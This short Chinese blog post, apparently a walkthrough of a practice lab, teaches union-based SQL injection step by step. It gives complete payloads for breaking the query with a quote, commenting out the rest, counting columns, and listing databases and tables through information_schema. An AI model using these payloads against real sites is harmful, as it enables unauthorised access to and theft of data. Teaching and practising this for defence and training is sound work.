好玩的sql第一篇

第一步:?id=1
正常显示

第二步:?id=1’
显示错误:LIMIT 0,1’ 这表示切片
(注:select * from tablename limit 2,4 即取出第3条至第6条,4条记录)
我们要加引号的话需要将后面的注释掉

第三步:?id=1’–+
利用–+将其闭合,考虑到URL编码问题,这里无法用/**/多行注释

第四步:?id=1’ union select 1,2,3–+ 或者 ?id=1’ order by 3猜解
测试关于字段的个数,从返回结果看出是否正确。

第五步:?id=0’ union select 1,group_concat(schema_name),3 from information_schema.schemata–+
查看所有库,information_schema.schemata这个表里面列举了所有数据库的名字,存放在schema_name这个字段里面。

第六步:?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27–+
查看information_schema.tables这个表里面,table_schema元组=’security’的所有table_name这个字段。

哈哈,你猜今天是几月几号呀